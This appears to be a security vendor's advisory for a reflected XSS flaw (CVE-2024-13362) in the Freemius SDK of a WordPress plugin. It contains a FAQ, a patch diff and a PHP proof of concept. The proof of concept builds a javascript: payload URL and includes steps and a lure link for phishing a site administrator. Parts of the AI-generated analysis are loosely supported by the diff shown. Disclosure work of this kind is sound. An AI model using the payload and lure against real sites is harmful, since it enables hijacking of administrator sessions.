What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK bundled with the ‘Delete Old Posts Programmatically’ WordPress plugin. It allows unauthenticated attackers to inject arbitrary JavaScript into the admin notice display area by manipulating the ‘url’ parameter.

Who is affected by this vulnerability?

WordPress installations using the ‘Delete Old Posts Programmatically’ plugin version 3.9.6 or earlier are affected by this vulnerability. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the ‘Plugins’ section, and locate the ‘Delete Old Posts Programmatically’ plugin. If the version is 3.9.6 or earlier, your site is vulnerable.

What is the severity level of this vulnerability?

The CVSS score for CVE-2024-13362 is 6.1, classified as Medium severity. This indicates that while the vulnerability is not critical, it poses a significant risk due to the potential for exploitation without authentication.

How does the vulnerability work?

The vulnerability works by allowing an attacker to craft a malicious URL that includes a JavaScript payload in the ‘url’ parameter. When an administrator clicks a link containing this URL, the JavaScript executes in their browser, potentially leading to session hijacking or other malicious actions.

What are the practical risks of this vulnerability?

Successful exploitation of this vulnerability can lead to serious consequences, such as session hijacking, privilege escalation, or theft of sensitive information. It requires user interaction, making it a significant phishing vector.

How can I fix this vulnerability?

To fix CVE-2024-13362, update the ‘Delete Old Posts Programmatically’ plugin to version 3.9.7 or later. This version includes a patch that sanitizes the ‘url’ parameter to prevent XSS attacks.

What does the patch do?

The patch for CVE-2024-13362 separates the message text from the button HTML and ensures that user-supplied data is properly escaped. This prevents the injection of malicious scripts into the admin notice.

What is a proof of concept in this context?

The proof of concept for CVE-2024-13362 is a script that generates a malicious URL designed to exploit the vulnerability. It illustrates how an attacker can craft a link that, when clicked by an admin, executes arbitrary JavaScript.

How can I mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider disabling the ‘Delete Old Posts Programmatically’ plugin until a patch can be applied. Additionally, educate users about the risks of clicking untrusted links.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, immediately review user activity, change passwords, and check for unauthorized changes. It is also advisable to consult with a security professional for a thorough assessment.

Where can I find more information about this vulnerability?

More information about CVE-2024-13362 can be found on the official CVE database, security advisories from WordPress, and detailed analyses from cybersecurity firms like Atomic Edge.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 8, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (delete-old-posts-programmatically)

CVE ID CVE-2024-13362

Plugin delete-old-posts-programmatically

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 3.9.6

Patched Version 3.9.7

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:

This vulnerability is a reflected DOM-based Cross-Site Scripting (XSS) in the Freemius SDK versions up to 2.10.1, which is bundled with the “Delete Old Posts Programmatically” WordPress plugin. An unauthenticated attacker can inject arbitrary JavaScript into the admin notice display area by manipulating the `url` parameter, achieving script execution when an administrator clicks a crafted link. The CVSS score is 6.1 (Medium).

Root Cause:
The vulnerable code resides in `freemius/includes/class-freemius.php` around line 24000, specifically within the `_add_sticky` method that constructs a trial promotion notice. The code directly concatenates user-supplied input from the `url` parameter into an HTML anchor tag without sanitization or escaping. The vulnerable line is:
`$this->apply_filters( ‘trial_promotion_message’, “{$message} {$cc_string} {$button}” );`
where `$button` contains the unsanitized URL. The patch moves the filter to only apply to `$message_text`, and wraps the button in a separate `

` that is constructed with a sanitized `$trial_url`.

Exploitation:
An attacker crafts a malicious URL such as:
`https://vulnerable-site.com/wp-admin/admin.php?page=delete-old-posts-programmatically&url=javascript:alert(document.domain)`
When the admin views the page, the `url` parameter is injected into the sticky admin notice’s HTML as an `href` attribute value. Because the value is not sanitized or escaped, a `javascript:` URI executes the payload in the admin’s browser context. The attacker must lure the administrator into clicking the generated button link.

Patch Analysis:
The patch in `class-freemius.php` separates the message text from the button HTML. The filter `trial_promotion_message` now applies only to `$message_text`, not the full HTML containing the button. The button is constructed separately using a safe template that includes the `$trial_url` variable which is properly escaped by the template engine. Additionally, the patch in `class-fs-admin-notice-manager.php` prevents loading a non-existent JavaScript template file, reducing potential attack surface. These changes ensure user-supplied data cannot be injected into HTML attributes without escaping.

Impact:
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the WordPress admin panel. This can lead to session hijacking, privilege escalation (creating new admin users), theft of authentication cookies, or exfiltration of sensitive information. The attack requires user interaction (clicking a link) but does not require authentication against the target site, making it a significant phishing vector.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/delete-old-posts-programmatically/delete-old-posts.php
+++ b/delete-old-posts-programmatically/delete-old-posts.php
@@ -7,7 +7,7 @@
  * Author URI:  https://wpmagic.cloud
  * License:     GPL3
  * License URI: https://www.gnu.org/licenses/gpl-3.0.html
- * Version:     3.9.6
+ * Version:     3.9.7
  * Text Domain: delete-old-posts
  *
  * @package headless-cms
--- a/delete-old-posts-programmatically/freemius/includes/class-freemius.php
+++ b/delete-old-posts-programmatically/freemius/includes/class-freemius.php
@@ -24000,13 +24000,15 @@

             // Start trial button.
             $button = ' ' . sprintf(
-                    '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s  ➜</button></a>',
+                    '<div><a class="button button-primary" href="%s">%s  ➜</a></div>',
                     $trial_url,
                     $this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
                 );

+            $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
             $this->_admin_notices->add_sticky(
-                $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+                "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
                 'trial_promotion',
                 '',
                 'promotion'
@@ -25476,7 +25478,7 @@
                 $img_dir = WP_FS__DIR_IMG;

                 // Locate the main assets folder.
-                if ( 1 < count( $fs_active_plugins->plugins ) ) {
+                if ( ! empty( $fs_active_plugins->plugins ) ) {
                     $plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );

                     foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/delete-old-posts-programmatically/freemius/includes/class-fs-plugin-updater.php
+++ b/delete-old-posts-programmatically/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@

             global $wp_current_filter;

-            $current_plugin_version = $this->_fs->get_plugin_version();
-
-            if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
-                if (
-                    is_null( $this->_update_details ) ||
-                    ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
-                ) {
-                    /**
-                     * After an update, clear the stored update details and reparse the plugin's main file in order to get
-                     * the updated version's information and prevent the previous update information from showing up on the
-                     * updates page.
-                     *
-                     * @author Leo Fajardo (@leorw)
-                     * @since 2.3.1
-                     */
-                    $this->_update_details  = null;
-                    $current_plugin_version = $this->_fs->get_plugin_version( true );
-                }
+            if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+                return $transient_data;
             }

             if ( ! isset( $this->_update_details ) ) {
@@ -568,7 +552,7 @@
                     false,
                     fs_request_get_bool( 'force-check' ),
                     FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
-                    $current_plugin_version
+                    $this->_fs->get_plugin_version()
                 );

                 $this->_update_details = false;
--- a/delete-old-posts-programmatically/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/delete-old-posts-programmatically/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
 	/**
 	 * Class FS_Plugin_Plan
 	 *
-	 * @property FS_Pricing[] $pricing
 	 */
 	class FS_Plugin_Plan extends FS_Entity {

--- a/delete-old-posts-programmatically/freemius/includes/entities/class-fs-site.php
+++ b/delete-old-posts-programmatically/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
         exit;
     }

-    /**
-     * @property int $blog_id
-     */
-    #[AllowDynamicProperties]
     class FS_Site extends FS_Scope_Entity {
         /**
          * @var number
          */
         public $site_id;
         /**
+         * @var int
+         */
+        public $blog_id;
+        /**
          * @var number
          */
         public $plugin_id;
--- a/delete-old-posts-programmatically/freemius/includes/entities/class-fs-user.php
+++ b/delete-old-posts-programmatically/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
 			parent::__construct( $user );
 		}

+		/**
+		 * This method removes the deprecated 'is_beta' property from the serialized data.
+		 * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+		 *
+		 * @return void
+		 */
+		function __wakeup() {
+			if ( property_exists( $this, 'is_beta' ) ) {
+				// If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+				unset( $this->is_beta );
+			}
+		}
+
 		function get_name() {
 			return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
 		}
--- a/delete-old-posts-programmatically/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/delete-old-posts-programmatically/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
 				$menu = $this->find_main_submenu();
 			}

+			$menu_slug   = $menu['menu'][2];
 			$parent_slug = isset( $menu['parent_slug'] ) ?
-                $menu['parent_slug'] :
-                'admin.php';
+				$menu['parent_slug'] :
+				'admin.php';

-            return admin_url(
-                $parent_slug .
-                ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
-                'page=' .
-                $menu['menu'][2]
-            );
+			if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+				$parent_slug = 'admin.php';
+
+				/**
+				 * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+				 *
+				 * @author Leo Fajardo (@leorw)
+				 * @since 2.10.2
+				 */
+				global $_parent_pages;
+
+				if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+					$_parent_slug = $_parent_pages[ $menu_slug ];
+					$parent_slug  = isset( $_parent_pages[ $_parent_slug ] ) ?
+						$parent_slug :
+						$menu['parent_slug'];
+				}
+			}
+
+			return admin_url(
+				$parent_slug .
+				( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+				'page=' .
+				$menu_slug
+			);
 		}

 		/**
--- a/delete-old-posts-programmatically/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/delete-old-posts-programmatically/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
          * @since  1.0.7
          */
         static function _add_sticky_dismiss_javascript() {
+            $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+            if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+                return;
+            }
+
             $params = array();
-            fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+            fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
         }

         private static $_added_sticky_javascript = false;
--- a/delete-old-posts-programmatically/freemius/start.php
+++ b/delete-old-posts-programmatically/freemius/start.php
@@ -15,7 +15,7 @@
 	 *
 	 * @var string
 	 */
-	$this_sdk_version = '2.10.1';
+	$this_sdk_version = '2.11.0';

 	#region SDK Selection Logic --------------------------------------------------------------------

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 Reflected DOM-Based XSS via url Parameter

echo "Atomic Edge PoC: CVE-2024-13362n";
echo "This script generates a malicious link to exploit the vulnerability.nn";

// Configuration
$target_url = 'http://localhost/wordpress'; // Change to target WordPress URL

// Construct the malicious URL
$payload = 'javascript:alert(document.domain)';
$exploit_url = sprintf(
    '%s/wp-admin/admin.php?page=delete-old-posts-programmatically&url=%s',
    rtrim($target_url, '/'),
    urlencode($payload)
);

echo "Malicious URL:n";
echo $exploit_url . "nn";
echo "Instructions:n";
echo "1. Send this URL to an authenticated WordPress admin.n";
echo "2. The admin must click the 'Start free trial' button on the page.n";
echo "3. The JavaScript payload will execute in the admin's session.nn";

// Provide a direct HTML payload for phishing
echo "Example phishing link (HTML):n";
echo '<a href="' . htmlspecialchars($exploit_url) . '">Click here for prize</a>n';

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK bundled with the ‘Delete Old Posts Programmatically’ WordPress plugin. It allows unauthenticated attackers to inject arbitrary JavaScript into the admin notice display area by manipulating the ‘url’ parameter.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress installations using the ‘Delete Old Posts Programmatically’ plugin version 3.9.6 or earlier are affected by this vulnerability. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the ‘Plugins’ section, and locate the ‘Delete Old Posts Programmatically’ plugin. If the version is 3.9.6 or earlier, your site is vulnerable.
What is the severity level of this vulnerability?
Understanding the CVSS score
The CVSS score for CVE-2024-13362 is 6.1, classified as Medium severity. This indicates that while the vulnerability is not critical, it poses a significant risk due to the potential for exploitation without authentication.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability works by allowing an attacker to craft a malicious URL that includes a JavaScript payload in the ‘url’ parameter. When an administrator clicks a link containing this URL, the JavaScript executes in their browser, potentially leading to session hijacking or other malicious actions.
What are the practical risks of this vulnerability?
Potential impacts on security
Successful exploitation of this vulnerability can lead to serious consequences, such as session hijacking, privilege escalation, or theft of sensitive information. It requires user interaction, making it a significant phishing vector.
How can I fix this vulnerability?
Updating the affected plugin
To fix CVE-2024-13362, update the ‘Delete Old Posts Programmatically’ plugin to version 3.9.7 or later. This version includes a patch that sanitizes the ‘url’ parameter to prevent XSS attacks.
What does the patch do?
Changes made in the updated version
The patch for CVE-2024-13362 separates the message text from the button HTML and ensures that user-supplied data is properly escaped. This prevents the injection of malicious scripts into the admin notice.
What is a proof of concept in this context?
Demonstrating the vulnerability
The proof of concept for CVE-2024-13362 is a script that generates a malicious URL designed to exploit the vulnerability. It illustrates how an attacker can craft a link that, when clicked by an admin, executes arbitrary JavaScript.
How can I mitigate the risk if I cannot update immediately?
Temporary measures to reduce exposure
If immediate updating is not possible, consider disabling the ‘Delete Old Posts Programmatically’ plugin until a patch can be applied. Additionally, educate users about the risks of clicking untrusted links.
What should I do if I suspect exploitation?
Response to potential attacks
If you suspect that your site has been exploited, immediately review user activity, change passwords, and check for unauthorized changes. It is also advisable to consult with a security professional for a thorough assessment.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2024-13362 can be found on the official CVE database, security advisories from WordPress, and detailed analyses from cybersecurity firms like Atomic Edge.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations